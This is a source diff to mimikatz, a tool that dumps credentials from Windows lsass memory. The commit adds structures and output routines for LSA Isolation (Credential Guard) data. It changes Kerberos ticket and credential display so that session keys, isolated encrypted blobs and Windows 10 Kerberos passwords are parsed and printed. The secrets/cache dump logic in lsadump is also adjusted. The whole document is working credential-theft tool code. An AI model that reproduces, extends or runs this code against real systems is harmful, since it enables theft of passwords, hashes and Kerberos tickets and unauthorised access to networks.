More LSA Isolation structures

mimikatz/modules/kerberos/kuhl_m_kerberos.c

@@ -206,7 +206,7 @@ NTSTATUS kuhl_m_kerberos_tgt(int argc, wchar_t * argv[])
 			kiwiTicket.RenewUntil = *(PFILETIME) &pKerbRetrieveResponse->Ticket.RenewUntil;
 			kiwiTicket.Ticket.Length = pKerbRetrieveResponse->Ticket.EncodedTicketSize;
 			kiwiTicket.Ticket.Value = pKerbRetrieveResponse->Ticket.EncodedTicket;
-			kuhl_m_kerberos_ticket_display(&kiwiTicket, FALSE);
+			kuhl_m_kerberos_ticket_display(&kiwiTicket, TRUE, FALSE);
 
 			for(i = 0; !isNull && (i < kiwiTicket.Key.Length); i++) // a revoir
 				isNull |= !kiwiTicket.Key.Value[i];

mimikatz/modules/kerberos/kuhl_m_kerberos_ccache.c

@@ -68,7 +68,7 @@ NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject,
 
 							if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE))
 							{
-								kuhl_m_kerberos_ticket_display(ticket, FALSE);
+								kuhl_m_kerberos_ticket_display(ticket, TRUE, FALSE);
 								if(isSave || isInject)
 								{
 									if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE))

mimikatz/modules/kerberos/kuhl_m_kerberos_ticket.c

@@ -5,7 +5,7 @@
 */
 #include "kuhl_m_kerberos_ticket.h"
 
-void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo)
+void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL withKey, BOOL encodedTicketToo)
 {
 	kprintf(L"\n\t   Start/End/MaxRenew: ");
 	kull_m_string_displayLocalFileTime(&ticket->StartTime); kprintf(L" ; ");
@@ -19,11 +19,14 @@ void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTi
 		kprintf(L" ( %wZ )", &ticket->Description);
 	kprintf(L"\n\t   Flags %08x    : ", ticket->TicketFlags);
 	kuhl_m_kerberos_ticket_displayFlags(ticket->TicketFlags);
-	kprintf(L"\n\t   Session Key       : 0x%08x - %s", ticket->KeyType, kuhl_m_kerberos_ticket_etype(ticket->KeyType));
-	if(ticket->Key.Value)
+	if(withKey)
 	{
-		kprintf(L"\n\t     ");
-		kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 0);
+		kprintf(L"\n\t   Session Key       : 0x%08x - %s", ticket->KeyType, kuhl_m_kerberos_ticket_etype(ticket->KeyType));
+		if(ticket->Key.Value)
+		{
+			kprintf(L"\n\t     ");
+			kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 0);
+		}
 	}
 	kprintf(L"\n\t   Ticket            : 0x%08x - %s ; kvno = %u", ticket->TicketEncType, kuhl_m_kerberos_ticket_etype(ticket->TicketEncType), ticket->TicketKvno);
 

mimikatz/modules/kerberos/kuhl_m_kerberos_ticket.h

@@ -99,7 +99,7 @@ typedef struct _KIWI_KERBEROS_TICKET {
 	KIWI_KERBEROS_BUFFER	Ticket;
 } KIWI_KERBEROS_TICKET, *PKIWI_KERBEROS_TICKET;
 
-void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo);
+void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL withKey, BOOL encodedTicketToo);
 void kuhl_m_kerberos_ticket_displayFlags(ULONG flags);
 void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PKERB_EXTERNAL_NAME pExternalName, IN PUNICODE_STRING pDomain);
 BOOL kuhl_m_kerberos_ticket_isLongFilename(PKIWI_KERBEROS_TICKET ticket);

mimikatz/modules/kuhl_m_lsadump.c

@@ -120,7 +120,7 @@ NTSTATUS kuhl_m_lsadump_secretsOrCache(int argc, wchar_t * argv[], BOOL secretsO
 	BOOL isKeyOk = FALSE;
 	BOOL isKiwi = kull_m_string_args_byName(argc, argv, L"kiwi", NULL, NULL);
 
-	if(argc)
+	if(argc && !(isKiwi && (argc == 1)))
 	{
 		hDataSystem = CreateFile(argv[0], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
 		if(hDataSystem != INVALID_HANDLE_VALUE)
@@ -129,7 +129,7 @@ NTSTATUS kuhl_m_lsadump_secretsOrCache(int argc, wchar_t * argv[], BOOL secretsO
 			{
 				if(kuhl_m_lsadump_getComputerAndSyskey(hSystem, NULL, sysKey))
 				{
-					if(argc > 1)
+					if((argc > 1) && !(isKiwi && (argc == 2)))
 					{
 						hDataSecurity = CreateFile(argv[1], GENERIC_READ | (isKiwi ? GENERIC_WRITE : 0), 0, NULL, OPEN_EXISTING, 0, NULL);
 						if(hDataSecurity != INVALID_HANDLE_VALUE)

mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c

@@ -799,10 +799,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 						}
 					}
 					else
-					{
-						kprintf(L"\n\t * Isolation data :\n");
-						kull_m_string_wprintf_hex((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0), (DWORD) ((PBYTE) pPrimaryCreds10->LogonDomainName.Buffer - ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0))), 1 | (16 << 16)); 
-					}
+						kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
 					break;
 				case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
 					pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@@ -852,9 +849,16 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 				buffer.Buffer = (PWSTR) pHashPassword->Checksump;
 				if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem))
 				{
-					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
-						(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
-					kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
+					if((flags & KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10) && (pHashPassword->Size > FIELD_OFFSET(LSAISO_DATA_BLOB, data)))
+					{
+						kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) buffer.Buffer);
+					}
+					else
+					{
+						if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
+							(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
+						kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
+					}
 					LocalFree(buffer.Buffer);
 				}
 			}
@@ -863,6 +867,9 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 		}
 		else
 		{
+			if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)
+				mesCreds->Password = ((PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL) mesCreds)->Password;
+
 			if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
 			{
 				if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
@@ -947,4 +954,14 @@ VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
 		kull_m_string_wprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0);
 		*dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase;
 	}
+}
+
+VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
+{
+	kprintf(L"\n\t   * LSA Isolated Data: %.*S", blob->typeSize, blob->data);
+	kprintf(L"\n\t     Unk-Key  : "); kull_m_string_wprintf_hex(blob->unkKeyData, 3*16, 0);
+	kprintf(L"\n\t     Encrypted: "); kull_m_string_wprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
+	//kprintf(L"\n\t\t   SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
+	//kprintf(L"\n\t\t   0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
+	//kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
 }

mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h

@@ -35,6 +35,7 @@
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY	0x03000000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK	0x07000000
 
+#define KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10		0x00100000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST		0x00200000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS		0x00400000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE			0x00800000
@@ -62,6 +63,7 @@ NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * lsassPack
 BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
 VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
 VOID kuhl_m_sekurlsa_genericKeyOutput(struct _MARSHALL_KEY * key, PVOID * dirtyBase);
+VOID kuhl_m_sekurlsa_genericLsaIsoOutput(struct _LSAISO_DATA_BLOB * blob);
 void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix);
 void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain);
 void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info);
@@ -166,4 +168,18 @@ typedef struct _KDC_DOMAIN_INFO {
 	KDC_DOMAIN_KEYS_INFO	OutgoingAuthenticationKeys;
 	KDC_DOMAIN_KEYS_INFO	IncomingPreviousAuthenticationKeys;
 	KDC_DOMAIN_KEYS_INFO	OutgoingPreviousAuthenticationKeys;
-} KDC_DOMAIN_INFO , *PKDC_DOMAIN_INFO;
+} KDC_DOMAIN_INFO , *PKDC_DOMAIN_INFO;
+
+typedef struct _LSAISO_DATA_BLOB {
+	DWORD structSize;
+	DWORD unk0;
+	DWORD typeSize;
+	DWORD unk1;
+	DWORD unk2;
+	DWORD unk3;
+	DWORD unk4;
+	BYTE unkKeyData[3*16];
+	BYTE unkEmpty[20];
+	DWORD origSize;
+	BYTE data[ANYSIZE_ARRAY];
+} LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;

mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c

@@ -289,7 +289,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SE
 	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
 	KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
 
-	kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
+	kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
 	if(aLsassMemory.address)
 	{
 		if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
@@ -350,7 +350,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
 					{
 						if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
 							for(i = 0; i < nbHash; i++)
-								kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
+								kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)));
 						LocalFree(aLocalHashMemory.address);
 					}
 				}
@@ -499,7 +499,7 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
 					pEnumData->callback(pData, aLocalMemory, aLsassMemory, pEnumData->optionalData);
 				LocalFree(aLocalMemory.address);
 			}
-		}
+		} else kprintf(L"KO");
 	} else kprintf(L"KO");
 }
 
@@ -511,6 +511,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
 	DWORD nbTickets = 0;
 	PKIWI_KERBEROS_TICKET pKiwiTicket;
 	PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
+	BOOL isNormalSessionKey;
 	wchar_t * filename;
 
 	if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize))
@@ -527,7 +528,8 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
 					kprintf(L"\n\t [%08x]", nbTickets);
 					if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem))
 					{
-						kuhl_m_kerberos_ticket_display(pKiwiTicket, FALSE);
+						isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < FIELD_OFFSET(LSAISO_DATA_BLOB, data));
+						kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE);
 						if(isFile)
 							if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT))
 							{
@@ -541,6 +543,12 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
 								LocalFree(filename);
 							}
 
+						if(!isNormalSessionKey)
+						{
+							kprintf(L"\n\t   LSA Session Key   : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
+							kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value);
+						}
+
 						kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket);
 					}
 					data.address = ((PLIST_ENTRY) (aTicket.address))->Flink;

mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h

@@ -267,6 +267,14 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION {
 	PVOID		SmartcardInfos;
 } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
 
+typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL
+{
+	LSA_UNICODE_STRING UserName;
+	LSA_UNICODE_STRING Domaine;
+	PVOID		unk0;
+	LSA_UNICODE_STRING Password;
+} KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_10_PRIMARY_CREDENTIAL;
+
 typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
 	ULONG		UsageCount;
 	LIST_ENTRY	unk0;
@@ -287,12 +295,12 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
 #ifdef _M_IX86
 	ULONG		unkAlign;
 #endif
-	KIWI_GENERIC_PRIMARY_CREDENTIAL	credentials;
+	KIWI_KERBEROS_10_PRIMARY_CREDENTIAL	credentials;
 	ULONG		unk14;
 	ULONG		unk15;
 	ULONG		unk16;
 	ULONG		unk17;
-	PVOID		unk18;
+	//PVOID		unk18;
 	PVOID		unk19;
 	PVOID		unk20;
 	PVOID		unk21;